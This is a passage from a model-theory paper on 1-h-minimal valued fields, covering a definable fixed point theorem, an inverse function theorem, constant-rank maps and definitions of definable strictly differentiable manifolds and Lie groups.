\[y-b=f^{\prime}(b)^{-1}(f(y)-f(b))-f^{\prime}(b)^{-1}f_{2}(b)(y-b)^{2}-\cdots-f^{\prime}(b)^{-1}f_{n}(b)(y-b)^{n}+O(y-b)^{n+1}.\] Putting \(y=f^{-1}(x)\), and remembering \(x-a=O(y-b)\), we conclude \[(\diamond)\ f^{-1}(x)-f^{-1}(a)=f^{\prime}(f^{-1}(a))^{-1}(x-a)+\sum_{2\leq i\leq n}c_{i}(a)(f^{-1}(x)-f^{-1}(a))^{i}+O(x-a)^{n+1},\] for some constants \(c_{i}(a)\). Next we proceed to showing (by induction on \(k\leq n\)) that \(f^{-1}\) is \(P_{k}\). As \(P_{0}\) follows from the equality \(|f^{-1}(x)-f^{-1}(y)|=|x-y|\), we may assume \(k\geq 1\). So suppose \(f^{-1}\) is \(P_{k-1}\). Using this, we can write \(f^{-1}(x)-f^{-1}(a)=\sum_{1\leq j<k}b_{j}(a)(x-a)^{j}+O(x-a)^{k}\), and apply a direct computation to obtain that \[c_{i}(a)(f^{-1}(x)-f^{-1}(a))^{i}=\sum_{i\leq j\leq k}d_{ij}(a)(x-a)^{j}+O(x-a)^{k+1},\] for some constants \(d_{ij}\). Note that as \(i\geq 2\) we obtain the improved error \(O(x-a)^{k+1}\). Substituting this in \((\diamond)\), the conclusion follows. Now suppose \(f\) is \(T_{n}\) at \(b\).
The proof in this case is similar: \[f^{-1}(x)-f^{-1}(x^{\prime})=f^{\prime}(f^{-1}(x^{\prime}))^{-1}(x-x^{\prime} )+\sum_{2\leq i\leq n}c_{i}(f^{-1}(x^{\prime}))(f^{-1}(x)-f^{-1}(x^{\prime})) ^{i}+O(x-x^{\prime})^{n+1},\] so, as above, if \(f^{-1}(x)\) is \(T_{k-1}\) we obtain \[f^{-1}(x)-f^{-1}(x^{\prime})=f^{\prime}(f^{-1}(x^{\prime}))^{-1}(x-x^{\prime} )+\sum_{2\leq i\leq k}d_{i}(x^{\prime})(x-x^{\prime})^{i}+O(x-x^{\prime})^{k+1}.\] Here note that \(f^{\prime}\) is \(P_{n-1}\) at \(b\) and so \(f^{\prime}(f^{-1}(x^{\prime}))^{-1}\) is \(P_{k-1}\) at \(a\). Also, following the above argument we see that the coordinates of \(d_{i}(x^{\prime})\) are sum and products of functions of the form \(b_{i^{\prime}}(x^{\prime})\) with \(1\leq i^{\prime}<i\), for \(b_{i^{\prime}}(x^{\prime})\) a \(P_{k-1-i^{\prime}}\) function at \(a\) (by the induction hypothesis that \(f^{-1}\) is \(T_{k-1}\)), and functions of the form \(c_{i^{\prime}}(f^{-1}(x^{\prime}))\) for \(c_{i^{\prime}}(y^{\prime})\) a \(P_{k-i^{\prime}}\) function at \(b\), \(i^{\prime}\leq i\) (by the assumption that \(f\) is \(T_{n}\)). So \(d_{i}(x^{\prime})\) is a \(P_{k-i}\) at \(a\). The next lemma will be important in our study of the differential structure of definable groups. For the statement, recall that \(O_{x}\) means that the constant implicit in the notation depends on \(x\), see Definition 2.1. **Lemma 3.15**.: _Let \(f:U\times V\to K^{r}\) be a definable function, where \(U\subset K^{n}\) and \(V\subset K^{m}\) are open sets around \(0\). Suppose \(f(x,y)\) is \(T_{2}\) at \((0,0)\), and \(f(x,y)=O(x,y)^{3}\). If \(axy+f(x,y)=O_{x}(y^{2})\), then \(a=0\)._ Proof.: By the definition of \(T_{2}\) (with \(x=x^{\prime}\), \(y^{\prime}=0\)) we get \(f(x,y)=f_{0}(x)+f_{1}(x)y+O(y^{2})\), for \(f_{1}\) a \(P_{1}\) function at \(0\) and \(f_{0}\) a \(P_{2}\) function at \(0\). Fixing \(x\) and expanding the Taylor polynomial of \(f(x,y)\) the uniqueness of Taylor coefficients (Lemma 3.10) gives, using our assumption, \(axy+f_{0}(x)+f_{1}(x)y=0\). Expanding \(f_{0},f_{1}\) around \(0\) and keeping in mind \(f(x,y)=O(x,y)^{3}\) we get \(f_{0}(x)=O(x^{3})\) and \(f_{1}(x)=O(x^{2})\). Indeed, we have \(f_{0}(x)=b_{0}+b_{1}x+b_{2}x^{2}+O(x^{3})\) and \(f_{1}(x)=c_{0}+c_{1}x+O(x^{2})\) so \(f(x,y)=b_{0}+b_{1}x+b_{2}x^{2}+c_{0}y+c_{1}xy+O(x,y)^{3}=O(x,y)^{3}\), so from the uniqueness of the Taylor coefficients we get \(b_{0}=b_{1}=b_{2}=c_{0}=c_{1}=0\). Now from \(axy=O(x,y)^{3}\), we get \(a=0\), by the uniqueness of Taylor coefficients again. ## 4. Strictly differentiable definable maps In this section we prove an inverse function theorem for definable strictly differentiable maps in a 1-h-minimal valued fields. This is done adapting a standard argument from real analysis using Banach's fixed point theorem. In the present section we use definable spherical completeness to obtain a definable version of Banach's fixed point theorem, implying, almost formally, the desired inverse function theorem. From the inverse function theorem we deduce results on the local structure of immersions and submersions in the usual way. We then proceed to proving a generic version of the theorem on the local structure of functions of constant rank (Proposition 4.11). This last result is obtained only generically. The reason is that definable functions whose partial derivative with respect to a variable \(x\) is \(0\) on an open set, \(U\) need not be locally constant in \(x\) in \(U\). 
For that reason, we give a different argument for a weaker result, see Proposition 4.8, and the discussion preceding it. Throughout the rest of this section, we fix an \(\aleph_{0}\)-saturated 1-h-minimal valued field \(K\). We start with a fixed point theorem, mentioned in [4, Remark 2.7.3]. We first note that a version of definable spherical completeness of \(1\)-h-minimal fields ([4, Lemma 2.7.1]) holds in positive residue characteristic: **Lemma 4.1**.: _Suppose \(K\) has positive residue characteristic \(p\). Suppose \(\{B_{i}\}_{i}\) is a definable chain of open balls or a definable chain of closed balls. Suppose, further, that for every \(i\) there is \(j\) such that \(\text{rad}(B_{j})\leq|p|\text{rad}(B_{i})\). Then \(\bigcap_{i}B_{i}\neq\emptyset\)._ Proof.: The proof is similar to spherical completeness in residue characteristic \(0\), see Lemma 2.7.1 of [4]. It is enough consider the \(1\)-dimensional case, since the higher dimensional case follows by considering the coordinate projections. Note also that our assumption implies that the chain \(\{B_{i}\}\) has no minimal element (as such an element would have valuative radius \(0\)). The closed case follows from the open case as follows: given a definable chain \(\{B_{i}\}_{i\in I}\) of closed balls. For each \(i\) let \(r_{i}\) be the valuative radius of \(B_{i}\) and let \(B_{i}^{\prime}\) be the unique open ball \(B\subseteq B_{i}\) of valuative radius \(r_{i}\) with the additional property that \(B\supseteq B_{j}\) for all \(j<i\). Obviously, \(\bigcap_{i}B_{i}=\bigcap_{i}B_{i}^{\prime}\) (unless the chain \(B_{i}\) has a minimal element, in which case there is nothing to prove). Note that, in the above notation, the map \(B_{i}\mapsto r_{i}\) is injective, so there is no harm assuming that \(\{B_{i}\}\) is indexed by a subset of \(\Gamma\). Thus, our chain \(\{B_{i}\}\) has index set interpretable in \(RV\), so by [5, Proposition 2.3.2] there is a finite set \(C\)\(m\)-preparing the chain \(\{B_{i}\}\) for some \(m\in\mathbb{N}\). We claim that \(C\cap B_{i}\neq\emptyset\) for all \(i\in I\). This would finish the proof, since \(C\) is finite. Assume, therefore, that this is not the case, and let \(i_{0}\in I\) be such that \(B_{i_{0}}\cap C=\emptyset\). By assumption we can find \(i<i_{0}\) such that \(r_{i}<|p^{m}|r_{i_{0}}\). Then \(B_{i}\) is a ball \(m\)-next to \(C\), and since our chain has no minimal element, any ball \(B\subsetneq B_{i}\) that is an element of our chain is not \(m\)-prepared by \(C\), a contradiction. Note that by [3, Example 1.5] infinitely ramified \(1\)-h-minimal fields of positive residue characteristic need not be definably spherically model complete. Thus, the extra condition in the assumption of the above lemma is not superfluous. **Proposition 4.2**.: _Let \(B_{r}=\{x\in K^{n}:|x|\leq r\}\). Suppose \(f:B_{r}\to B_{r}\) is a definable function. Assume that for distinct \(x,y\in B_{r}\), we have_ 1. \(|f(x)-f(y)|<|x-y|\) _if the residue characteristic is_ \(0\)_._ 2. \(|f(x)-f(y)|\leq|p||x-y|\) _if the residue characteristic is_ \(p>0\)_._ _Then \(f\) has a unique fixed point in \(B_{r}\)._ Proof.: Uniqueness is immediate from the hypothesis. For existence take the family of balls of the form \(B(a)_{|f(a)-a|}\). It is a definable chain of balls indexed by \(a\in B_{r}\). Indeed if \(a,b\in B_{r}\) are distinct and the balls are disjoint then \(|f(a)-f(b)|=|a-b|\), as the distance of points in disjoint balls does not change. 
Note that in positive residue characteristic the additional hypothesis of Lemma 4.1 is satisfied, because \(|f(f(a))-f(a)|\leq|p||f(a)-a|\), by assumption 2 on \(f\). By the appropriate version of definable spherical completeness of 1-h-minimal fields (Lemma 2.7.1 of [4] for residue characteristic \(0\), Lemma 4.1 otherwise), we obtain a point \(x\) in the intersection of all balls. Then \(x\) is a fixed point of \(f\). Indeed, if we assume otherwise then for \(y=f(x)\), we have \(|f(y)-y|<|f(x)-x|\) by the hypothesis. On the other hand if \(a\) is arbitrary then, as \(x\in B(a)_{|f(a)-a|}\), one has \(|f(x)-f(a)|\leq|x-a|\leq|f(a)-a|\) and so \(|f(x)-x|\leq|f(a)-a|\). Taking \(a=y\) yields \(|f(x)-x|\leq|f(y)-y|<|f(x)-x|\). This is a contradiction and finishes the proof. Just as in real analysis this fixed point theorem implies an inverse function theorem. **Proposition 4.3**.: _Suppose \(f:U\to K^{n}\) is a definable function from an open set \(U\subset K^{n}\) satisfying the following "bilipschitz condition": for every \(x,y\in U\) distinct_ 1. \(|f(x)-f(y)-(x-y)|<|x-y|\) _if the residue characteristic is_ \(0\)_._ 2. \(|f(x)-f(y)-(x-y)|\leq|p||x-y|\) _if the residue characteristic is_ \(p>0\)_._ _Then \(f(U)\) is open and \(f\) is a homeomorphism from \(U\) to \(f(U)\). If \(f\) is (strictly) differentiable then \(f^{-1}\) is (strictly) differentiable._ Proof.: Injectivity of the map follows directly from the hypothesis. The same assumptions also imply that if \(x,y\in U\) are distinct then \(|f(x)-f(y)|=|x-y|\), implying continuity of the inverse. The main difficulty is showing that \(f(U)\) is open. Translating, we may assume \(0\in U\) and \(f(0)=0\). We have to find an open neighborhood of \(0\) in \(f(U)\). Take \(r>0\) such that \(0\in B_{r}\subset U\). Then \(B_{r}\subset f(U)\). Indeed, if \(|a|\leq r\) then the function \(g(x)=x+a-f(x)\) satisfies \(g(B_{r})\subset B_{r}\), since \(|g(x)|\leq\max(|x-f(x)|,|a|)\) and \(|f(x)-x|=|f(x)-f(0)-(x-0)|\leq|x|\leq r\). By the assumptions on \(f\) this implies that \(g\) satisfies the hypothesis of Proposition 4.2. So \(g(x_{0})=x_{0}\) for some \(x_{0}\), namely, \(a=f(x_{0})\), as claimed. Differentiability (and strict differentiability) of \(f^{-1}\) now follow from Proposition 3.13. We can finally formulate and prove the inverse function theorem for \(1\)-h-minimal fields: **Proposition 4.4**.: _Suppose \(f:U\to K^{n}\) is a definable function from an open set \(U\subset K^{n}\). Suppose \(f\) is strictly differentiable at \(a\) and \(f^{\prime}(a)\) is invertible. Then there is an open set \(V\subseteq U\) around \(a\) such that \(f(V)\) is open and \(f:V\to f(V)\) is a bijection whose inverse is strictly differentiable at \(f(a)\)._ Proof.: By the definition of strict differentiability the function \(f^{\prime}(a)^{-1}f\) satisfies the hypothesis of the previous proposition in a small open ball around \(a\). The conclusion follows. We do not know whether there can exist a definable function \(f:U\to K\) with continuous partial derivatives that is not strictly differentiable in \(U\).\({}^{2}\) Clearly, sums, products and compositions of strictly differentiable functions are strictly differentiable, and so are locally analytic functions. Moreover, strict differentiability is first order definable, and therefore extends to elementary extensions. Also, by the generic Taylor approximation theorem, in the \(1\)-h-minimal context, any definable function in an open subset of \(K^{n}\) is strictly differentiable in a dense open subset. See Proposition 3.12.
Footnote 2: In real analysis it is well known that a function \(f:U\to\mathbb{R}\) is \(\mathcal{C}^{1}\) in \(U\) if and only if it is strictly differentiable there. Our next goal is to study definable functions of constant rank. We first note that, without the assumption of definability, a strictly differentiable function whose derivative vanishes identically need not be locally constant: **Example 4.5**.: Consider a function \(f:\mathcal{O}\to\mathcal{O}\) that is locally constant in \(\mathcal{O}\setminus\{0\}\) but near \(0\) grows like \(x^{2}\). Such a function \(f\) will be strictly differentiable, with \(f^{\prime}\equiv 0\), but \(f\) is not locally constant at \(0\). Roughly, a function as in the above example involves an infinite number of choices, so it is not definable. In contrast we have: **Proposition 4.6**.: _Let \(f:U\to K^{m}\) be a function definable in an open set \(U\subset K^{n}\). Assume \(f\) is continuous. Assume \(f\) is differentiable with derivative \(0\) on an open dense subset of \(U\). Then \(f\) is locally constant with finite image._ Proof.: We proceed by induction on \(n\), the dimension of the domain. We may assume \(m=1\). First assume \(n=1\). By the valuative Jacobian property in [4, Corollary 3.1.6] and [5, Corollary 3.1.3], there is a finite set \(C\subset U\) such that in \(U\setminus C\) the function \(f\) is locally constant. This implies that the fibers of \(f|_{U\setminus C}\) are of dimension 1, and so the image of \(f\) is finite. As \(f\) is continuous with finite image, the fibers form a finite partition of \(U\) into closed, and hence open, sets on which \(f\) is constant, so \(f\) is locally constant. Now assume the proposition is valid for \(n\), and suppose \(U\subset K^{n}\times K\). We denote by \(\pi_{1}:K^{n}\times K\to K^{n}\) the projection onto the first factor and by \(\pi_{2}:K^{n}\times K\to K\) the projection onto the second factor. Let \(V\subset U\) be an open dense subset such that \(f\) is differentiable on \(V\) with derivative \(0\). Denote \(C=U\setminus V\). Let \(T=\{x\in K^{n}\mid\dim(\pi_{1}^{-1}(x)\cap C)=1\}\); then \(\dim(T)<n\). We conclude that there is an open dense set \(W\subset K^{n}\) such that \(\dim(\pi_{1}^{-1}(x)\cap C)=0\) for all \(x\in W\). Similarly, there is an open dense set \(P\subset K\) such that \(\dim(\pi_{2}^{-1}(x)\cap C)<n\) for every \(x\in P\). Shrinking \(V\) to \(V\cap\pi_{1}^{-1}(W)\cap\pi_{2}^{-1}(P)\) we may assume that if \((x,y)\in V\) then \(V_{x}\) is an open dense subset of \(U_{x}\) and \(V_{y}\) is an open dense subset of \(U_{y}\). By the induction hypothesis and the \(n=1\) case, we conclude that \(f_{x}\) and \(f_{y}\) are locally constant. This implies that the fiber \(f^{-1}f(x,y)\) has dimension \(n+1\). Indeed, if \(B\) is an open neighborhood of \(y\) on which \(f_{x}\) is constant and for each \(y^{\prime}\in B\) we take \(R_{y^{\prime}}\subset U_{y^{\prime}}\) an open neighborhood of \(x\) on which \(f_{y^{\prime}}\) is constant, then \(f\) is constant on \(\bigcup_{y^{\prime}\in B}R_{y^{\prime}}\times\{y^{\prime}\}\). By dimension considerations, we conclude that the image \(f(V)\) is finite. As \(f\) is continuous, \(f^{-1}f(V)\) is closed in \(U\), and as \(V\) is dense in \(U\), we conclude \(f(U)=f(V)\) is finite. As \(f\) is continuous, we conclude \(f\) is locally constant as before. Given the previous proposition we may expect that a definable strictly differentiable function \(f:U\to K^{m}\) with open domain \(U\subset K^{r}\times K^{s}\) satisfying \(D_{y}f(x,y)=0\) is locally of the form \(f(x,y)=g(x)\).
Unfortunately this is not true. **Example 4.7**.: Take \(f:\mathcal{O}\times\mathcal{O}\to\mathcal{O}\) defined by \(f(x,y)=0\) if \(|y|>|x|\) and \(f(x,y)=x^{2}\) if \(|y|\leq|x|\). Then \(f\) is strictly differentiable, \(f(x,\cdot)\) is locally constant, but \(f\) is not of the form \(g(x)\) near \((0,0)\). It is due to this pathology that the conclusion of Proposition 4.11 below only holds generically. Below, we let \(D_{y}f(x,y)\) be the differential of the function \(f_{x}\), given by \(f_{x}(y)=f(x,y)\); we call this the derivative of \(f\) with respect to \(y\) (where \(y\) can be a tuple of variables). **Proposition 4.8**.: _Suppose \(U\subset K^{n}\), and \(V\subset K^{r}\) are open and \(f:U\times V\to K^{m}\) is a definable function such that \(f\) is continuous and \(D_{y}f=0\) on a dense open subset of \(\operatorname{dom}(f)\). Then there exists an open dense set \(U^{\prime}\subset U\) such that \(f|_{U^{\prime}}\) is locally of the form \(g(x)\)._ Proof.: The set, \(D\) of points \(x\in U\) such that for every point of \(\{x\}\times V\)\(f\) is locally of the form \(g(x)\) is definable. More precisely, \(x\in D\) exactly when for all \(y\in V\), there exists an open ball \(B\ni(x,y)\), such that for all \((x^{\prime},y^{\prime}),(x^{\prime},y^{\prime\prime})\in B\) we have \(f(x^{\prime},y^{\prime})=f(x^{\prime},y^{\prime\prime})\). Thus, the statement that \(D\) has dense interior in \(U\) is a first order expressible property, so we may assume that \(\operatorname{acl}=\operatorname{dcl}\), see Fact 2.5 and the subsequent remark. In the course of the proof we may replace \(U\) by a dense open subset a finite number of times. Fix, \(W\subset U\times V\), a dense open set where \(f\) is differentiable and its derivative with respect to \(y\) is \(0\). Shrinking \(U\) we may assume \(W_{x}\subset V\) is dense open for all \(x\in U\). By Proposition 4.6 we know that \(f_{x}\) is locally constant with finite image for every \(x\in U\) (recall that \(f_{x}(y):=f(x,y)\)). The sets \(\operatorname{Im}(f_{x})\) form a definable family of finite sets indexed by \(x\in U\), so there is uniform bound, \(n\), on their cardinalities. Denoting \(A_{k}=\{x\in U:|\operatorname{Im}(f_{x})|=k\}\) we have \(U=A_{1}\cup\cdots\cup A_{n}\), so the union of the interiors of the \(A_{k}\) form a dense open subset of \(U\). Since the closures of the \(\operatorname{Int}(A_{k})\) are pairwise disjoint, we may assume that \(|\operatorname{Im}(f_{x})|=k\) for all \(x\) and some fixed \(k\). Since we assumed that \(\operatorname{acl}=\operatorname{dcl}\), there are definable functions \(r_{1},\ldots,r_{k}:U\to K^{m}\) such that \(\{r_{1}(x),\ldots,r_{k}(x)\}=\operatorname{Im}(f_{x})\). By generic continuity of definable functions (Proposition 2.12) we may assume that \(r_{i}\) are all continuous. Then the sets \(B_{i}=\{(x,y):f(x,y)=r_{i}(x)\}\) form a finite partition of \(U\times V\) into closed, and so open subsets. The next two results, describing the local structure of definable maps of full rank, are standard applications of the inverse function theorem: **Proposition 4.9**.: _Suppose \(U\subset K^{k}\) is a definable open set and \(f:U\to K^{k}\times K^{r}\) is a definable, strictly differentiable map. Suppose that for some \(a\in U\) the derivative \(f^{\prime}(a)\) has full rank. 
Then there is a ball \(a\in B\subset U\), a ball \(B_{2}\ni 0\), a definable open set \(V\subset K^{k}\times K^{r}\), and a definable strict diffeomorphism \(\varphi:V\to B\times B_{2}\) such that \(f(B)\subset V\) and the composition \(\varphi f:B\to B\times B_{2}\) is the inclusion \(b\mapsto(b,0)\)._ Proof.: After a coordinate permutation in the target we may assume the principal \(k\times k\) minor of \(f^{\prime}(a)\) is invertible. Consider the function \(g:U\times K^{r}\to K^{k}\times K^{r}\) defined as \(g(x,y)=f(x)+(0,y)\). Then \(g\) is strictly differentiable and has invertible derivative at \((a,0)\) so by the inverse function theorem, Proposition 4.4, we can find a ball \(B\) around \(a\) and a ball \(B_{2}\) around \(0\), and open set \(f(a)\in V\) such that \(g\) restrict to a strict diffeomorphism \(g:B\times B_{2}\to V\). If \(i:B\to B\times B_{2}\) is the inclusion \(i(b)=(b,0)\) then we get that \(gi=f\), so we conclude the statement is valid with \(\varphi=g^{-1}\). **Proposition 4.10**.: _Suppose \(U\subset K^{k}\times K^{r}\) is a definable open set, and \(f:U\to K^{k}\) is a definable strictly differentiable map. Let \(a\in U\). Suppose \(f^{\prime}(a)\) has full rank. Then there exists a definable open set \(a\in U^{\prime}\subset U\), a ball \(f(a)\in B\), a ball \(B_{2}\subseteq K^{r}\), and a definable strict diffeomorphism \(\varphi:B\times B_{2}\to U^{\prime}\), such that \(f(U^{\prime})\subset B\) and the composition \(f\varphi:B\times B_{2}\to B\) is the projection \((b,c)\mapsto b\)._ Proof.: After applying a coordinate permutation to \(U\) we may assume that the principal \(k\times k\) minor of \(f^{\prime}(a)\) is invertible. Consider the function \(g:U\to K^{k}\times K^{r}\) defined as \(g(x,y)=(f(x,y),y)\). Then \(g\) is strictly differentiable with invertible differential, so by the inverse function theorem, Proposition 4.4, there is an open set \(a\in U^{\prime}\subset U\) such that \(g(U^{\prime})\) is open and \(g:U^{\prime}\to g(U^{\prime})\) is a strict diffeomorphism. Making \(U^{\prime}\) smaller we may assume \(g(U^{\prime})=B\times B_{2}\) is a product of two balls. Then if \(p:B\times B_{2}\to B\) is the projection \(p(b,c)=b\), we get that \(pg=f\) and so the statement is valid with \(\varphi=g^{-1}\). We can finally prove our result on the local structure of definable functions of constant rank: **Proposition 4.11**.: _Let \(U\subset K^{k}\times K^{r}\) and \(V\subset K^{k}\times K^{s}\) be open definable sets and let \(f:U\to V\) be a definable strictly differentiable map such that for all \(a\in U\) the rank of \(f^{\prime}(a)\) is constant equal to \(k\). Then there exist \(U^{\prime}\subset U\) and \(V^{\prime}\subset V\) definable open sets, such that \(f(U^{\prime})\subset V^{\prime}\) and there are definable strict diffeomorphisms \(\varphi_{1}:B_{1}\times B_{2}\to U^{\prime}\) and \(\varphi_{2}:V^{\prime}\to B_{1}\times B_{3}\), such that the composition \(\varphi_{2}f\varphi_{1}:B_{1}\times B_{2}\to B_{1}\times B_{3}\) is the map \((a,b)\mapsto(a,0)\)._ Proof.: Take a point \((b,c)\in U\). After a coordinate permutation in \(U\) and \(V\) we may assume \(f^{\prime}(b,c)\) has its first \(k\times k\) minor invertible. Then by the theorem on submersions, Proposition 4.10, applied to the composition of \(f:U\to K^{k}\times K^{s}\) with the projection \(K^{k}\times K^{s}\to K^{k}\) onto the first factor, we may assume that \(U\) is of the form \(B_{1}\times B_{2}\) and \(f\) is of the form \(f(x,y)=(x,g(x,y))\). 
As \(f^{\prime}\) has constant rank equal to \(k\) we conclude that \(D_{y}g=0\). By Proposition 4.8 we may assume \(g(x,y)\) is of the form \(g(x,y)=g(x)\) (after passing to smaller open balls of \(B_{1}\) and \(B_{2}\) not necessarily containing \((b,c)\)). Now the function \(h:B_{1}\to K^{k}\times K^{s}\) defined by \(h(x)=(x,g(x))\) is a definable strictly differentiable immersion, so by the theorem on immersions, Proposition 4.9, we may, after shrinking \(B_{1}\) and composing with a definable diffeomorphism in the target, assume that \(h\) is of the form \(h(x)=(x,0)\). This finishes the proof. ## 5. Strictly differentiable definable manifolds In this section we define definable manifolds in a 1-h-minimal field, and variants. These are manifolds which are covered by a finite number of definable charts, with compatibility functions of various kinds. Throughout, we keep the convention that \(K\) is an \(\aleph_{0}\)-saturated \(1\)-h-minimal field. In case \(\operatorname{acl}_{K}\) is not the same as \(\operatorname{dcl}_{K}\) it is better to take "etale domains" instead of open subsets of \(K^{n}\) as the local model of the manifold. This is because the cell decomposition, as provided by Proposition 2.15, decomposes a definable set into a finite number of pieces, each of which is only a finite cover of an open set, instead of an open set. We describe this notion formally below: **Definition 5.1**.: Let \(S\subset K^{m}\). A definable function \(f:S\to K^{n}\) is (topologically) etale if it is a local homeomorphism. In other words, for every \(x\in S\) there is a ball \(x\in B\) such that \(f(B\cap S)\) is open and the inverse map \(f(B\cap S)\to B\cap S\to K^{m}\) is continuous. Informally, we think of etale maps as similar to open immersions, and will denote such maps accordingly e.g., \(i:U\to K^{n}\). We now proceed to describe the differential structure of etale maps (or, rather, etale domains): **Definition 5.2**.: Suppose \(i:U\to K^{n}\) and \(j:V\to K^{m}\) are etale maps. A definable function \(f:U\to V\) is strictly differentiable at \(x\in U\) if there are balls \(x\in B\) and \(f(x)\in B^{\prime}\) such that \(i:B\cap U\to i(B\cap U)\), \(j:B^{\prime}\cap V\to j(B^{\prime}\cap V)\) are homeomorphisms onto open sets, such that \(f(B\cap U)\subset B^{\prime}\cap V\), and the map \(i(B\cap U)\xrightarrow{i^{-1}}B\cap U\xrightarrow{f}B^{\prime}\cap V\xrightarrow{j}j(B^{\prime}\cap V)\) is strictly differentiable at \(i(x)\). In this case the derivative \(f^{\prime}(x)\) is defined as the derivative of the map \(i(B\cap U)\to j(B^{\prime}\cap V)\) at \(i(x)\). The function \(f:U\to V\) is called \(T_{k}\) at \(x\) if the composition \(i(B\cap U)\to j(B^{\prime}\cap V)\) is \(T_{k}\) at \(i(x)\). Note that with this definition the given inclusion \(U\subset K^{r}\) is not necessarily strictly differentiable, because the local inverses \(i(U\cap B)\to K^{r}\) of the map \(i:U\to K^{n}\) are only topological embeddings, so not necessarily strictly differentiable. **For the rest of this section let \(\mathcal{P}\) stand for any one of the following adjectives: topological, strictly differentiable, or \(T_{n}\)**. **Definition 5.3**.: A definable weak \(\mathcal{P}\)-\(n\)-manifold is a definable set, \(M\), equipped with a finite number of definable injections, \(\varphi_{i}:U_{i}\to M\), where each \(U_{i}\) comes equipped with an etale map \(r_{i}:U_{i}\to K^{n}\).
We require further that the sets \(U_{ij}:=\varphi_{i}^{-1}(\varphi_{j}(U_{j}))\) are open in \(U_{i}\), and that the transition maps \(U_{ij}\to U_{ji}\), \(x\mapsto\varphi_{j}^{-1}\varphi_{i}(x)\), are \(\mathcal{P}\)-maps. We further define: 1. A definable weak \(\mathcal{P}\)-manifold is a definable weak \(\mathcal{P}\)-\(n\)-manifold for some \(n\). 2. A weak \(\mathcal{P}\)-manifold is equipped with a topology making the structure maps, \(\varphi_{i}\), open immersions. 3. A morphism of definable weak \(\mathcal{P}\)-manifolds is a definable function \(f:M\to N\), such that for any charts \(\varphi_{i}:U_{i}\to M\) and \(\tau_{j}:V_{j}\to N\) the set \(W_{ij}=\varphi_{i}^{-1}f^{-1}\tau_{j}(V_{j})\) is open in \(U_{i}\) and the map \(W_{ij}\to V_{j}\) given by \(x\mapsto\tau_{j}^{-1}f\varphi_{i}(x)\) is a \(\mathcal{P}\)-map. 4. A definable \(\mathcal{P}\)-\(n\)-manifold is a definable weak \(\mathcal{P}\)-\(n\)-manifold, where the \(U_{i}\) are open subsets of \(K^{n}\) (and the maps \(U_{i}\to K^{n}\) are inclusions). 5. A morphism of definable \(\mathcal{P}\)-manifolds is a morphism of weak definable \(\mathcal{P}\)-manifolds. Definable weak \(K\)-manifolds are, immediately from the definition, (abstract) manifolds over \(K\). As such, definable differentiable weak manifolds inherit the classical differential structure. For the sake of completeness we recall the relevant definitions: **Definition 5.4**.: If \(M\) is a definable strictly differentiable weak manifold and \(x\in M\), then the tangent space of \(M\) at \(x\), \(T_{x}(M)\), is the quotient of the disjoint union of \(T_{i}=T_{\varphi_{i}^{-1}(x)}(U_{i})=K^{n}\) for \((U_{i},\varphi_{i})\) a chart around \(x\), under the identification of the spaces \(T_{i}\) and \(T_{j}\) associated with the charts \(U_{i},U_{j}\) via the map \((\varphi_{j}^{-1}\varphi_{i})^{\prime}(\varphi_{i}^{-1}(x))\). For a strictly differentiable definable morphism \(f:M\to N\) of definable strictly differentiable weak manifolds, we have a map of \(K\)-vector spaces \(f^{\prime}(x):T_{x}(M)\to T_{f(x)}(N)\) given by the differential of the map appearing in Definition 5.3 above. As usual, once we have a chart around a point in a weak strictly differentiable manifold, we get an identification of \(T_{x}(M)\) with \(K^{n}\), but distinct charts may give distinct isomorphisms. **Definition 5.5**.: A definable (weak) \(\mathcal{P}\)-Lie group is a group object in the category of definable (weak) \(\mathcal{P}\)-manifolds. **Lemma 5.6**.: _Suppose \(i:U\to K^{n}\) and \(j:V\to K^{m}\) are etale and \(f:U\to V\) is a definable map. Then \(f\) is continuous in an open dense subset of \(U\)._ _Also \(f\) is strictly differentiable and \(T_{k}\) in an open dense subset of \(U\)._ Proof.: For the statement about continuity, note that \(V\) has the subspace topology (of \(V\subset K^{r}\)) so we may assume \(V=K^{r}\). If we denote by \(U^{\prime}\) the interior (relative to \(U\)) of the set of points of \(U\) where \(f\) is continuous, then in every ball \(B\) where \(i\) is a homeomorphism \(i:B\cap U\to i(B\cap U)\) we get that \(B\cap U\cap U^{\prime}\) is dense in \(B\cap U\), by generic continuity of definable functions. We conclude that \(U^{\prime}\) is dense as required. For strict differentiability and \(T_{k}\), by the above we may assume that \(f\) is continuous. Let \(U^{\prime}\) be the interior of the set of all points where \(f:U\to V\) is strictly differentiable and \(T_{k}\). This is a definable open set.
By generic differentiability and generic \(T_{k}\) property for functions defined on open sets, for every point \(x\in U\) there is an open ball \(B\ni x\), such that \(U\cap B\cap U^{\prime}\) is dense in \(U\cap B\). Thus, we conclude that \(U^{\prime}\) is dense in \(U\). Note that the previous lemma implies that a (weak) definable topological manifold \(M\) contains an open dense subset \(U\subset M\), which admits a structure of a (weak) definable \(T_{n}\) manifold extending the given (weak) definable topological manifold structure. As a consequence of Proposition 5.7 below we have that this structure on \(U\) is unique up to isomorphism and restriction to a definable open dense subset. For that reason, several of the statements below hold (essentially unaltered) for definable weak manifolds (without further assumptions on differentiability or \(T_{n}\)). For the sake of clarity of the exposition, we keep these assumptions. **Proposition 5.7**.: _If \(f:M\to N\) is a definable function and \(M\), \(N\) are definable weak \(\mathcal{P}\)-manifolds, then \(f\) is a \(\mathcal{P}\)-map in an open dense set of \(M\)._ Proof.: Considering the charts in \(M\) we may assume \(M=U\to K^{n}\) is etale. Now if \((V_{i},\tau_{i})\) are charts for \(N\), then \(f^{-1}\tau_{i}(V_{i})\) cover \(U\), and so the union of their interiors is open dense in \(U\). So we may assume \(N=V\to K^{m}\) is etale. This case is Lemma 5.6. Recall that the local dimension of a definable set \(X\) is defined as \[\dim_{x}X=\min\{\dim(B\cap X):x\in B\text{ is a definable open neighborhood of }x\text{ in }M\}.\] The next lemma is standard: **Lemma 5.8**.: _Suppose \(M\) is a definable topological weak manifold. Let \(X\subset M\) be a definable subset. Then \(\dim(X)=\max_{x\in X}\dim_{x}(X)\)._ _If \(G\) is a definable weak topological group and \(H\) is a subgroup, then the dimension of \(H\) is the local dimension of \(H\) at any point._ Proof.: If \(M=U_{1}\cup\dots\cup U_{n}\) is a covering by open sets and \(\varphi_{i}:U_{i}\to V_{i}\) is a homeomorphism onto a set \(V_{i}\), with an etale map \(V_{i}\to K^{n}\), then \(\dim(X)=\max_{i}(\dim(\varphi_{i}(X\cap U_{i})))\), and the local dimension of \(X\) at \(x\in X\cap U_{i}\) is the local dimension of \(\varphi_{i}(X\cap U_{i})\) at 